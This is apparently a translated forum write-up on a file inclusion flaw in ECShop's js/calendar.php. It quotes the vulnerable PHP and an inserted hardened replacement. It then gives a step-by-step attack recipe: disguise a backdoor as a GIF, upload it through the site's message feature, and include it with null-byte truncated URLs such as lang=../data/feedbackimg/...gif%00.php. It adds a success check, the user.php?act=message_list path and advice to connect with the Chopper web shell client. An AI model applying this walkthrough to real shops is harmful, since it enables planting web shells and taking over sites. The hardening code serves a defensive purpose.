Looking directly at the code:
$lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : 'EN'; // no filtering at all, obviously a vulnerability
if (!file_exists('../languages/' . $lang . '/calendar.php'))
    $lang = 'EN';
require(dirname(dirname(__FILE__)) . '/data/config.php');
include_once('../languages/' . $lang . '/calendar.php'); // included here; the path needs to be truncated (null byte)
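For comparison, a hardened replacement for the language selection above, added here as an example and not ECShop's own code. It assumes the same layout as the vulnerable snippet (this file in js/, language packs in ../languages/<lang>/calendar.php) and rejects the lang value unless it is a plain directory name that resolves inside the languages tree, so '../' and a NUL byte (%00) can no longer steer the include to an uploaded file.

```php
<?php
// Added example, not ECShop's code. Hardened language selection for
// js/calendar.php: $_GET['lang'] is never used to build a path until it
// has passed a strict pattern check and a realpath() containment check.

// Assumed layout (same as the vulnerable code): this file lives in js/,
// language packs live in ../languages/<lang>/calendar.php.
$langDir = realpath(dirname(dirname(__FILE__)) . '/languages');

function select_language($requested, $langDir)
{
    $default = 'EN';
    // Only a short directory name of letters, digits, '_' or '-' is accepted.
    // The D modifier makes $ match only at the very end of the string, so
    // '../', '/', a trailing newline and the NUL byte (%00) all fail here.
    if (!preg_match('/^[A-Za-z0-9_-]{1,16}$/D', $requested)) {
        return $default;
    }
    $candidate = realpath($langDir . '/' . $requested . '/calendar.php');
    // realpath() returns false when the file does not exist; the prefix
    // check confirms the resolved file really sits inside the languages tree.
    if ($candidate === false
        || strpos($candidate, $langDir . DIRECTORY_SEPARATOR) !== 0) {
        return $default;
    }
    return $requested;
}

$lang = select_language(isset($_GET['lang']) ? trim($_GET['lang']) : 'EN', $langDir);
require(dirname(dirname(__FILE__)) . '/data/config.php');
include_once($langDir . '/' . $lang . '/calendar.php');
```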
Some time ago I was poking around an ECShop site. Later I found that this vulnerability can be used through a side door to get a shell, so I simply used it that way.
I forged a backdoor file with a GIF89a header to pass as a GIF, then registered a mall account, went to the "I want to comment" section, left a message with an image upload, and then used the include directly to get the shell!
The URL for the exploit circulating online looks like this: http://www.*.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00
To get the shell, just append a .php after the null byte; it is that simple, and the file is then treated as a PHP file and executed as a script.
For example: js/calendar.php?lang=../data/feedbackimg/309_20110405qzitof.gif%00./1.php
Using js/calendar.php?lang=../data/feedbackimg/309_20110405qzitof.gif%00.php directly also works!
After uploading the fake GIF image, construct the URL for the vulnerability above and open it (if "E" appears, it succeeded; if Chinese text appears, it failed).
By the way, if you use pop to download, I suggest connecting with Chopper; it is more convenient!
(The pop-up download did not work before; it may have been upgraded, but that has no impact on this vulnerability.)
If you cannot find the message page, append user.php?act=message_list to the root directory URL.
If that page does not open, then this cannot be used.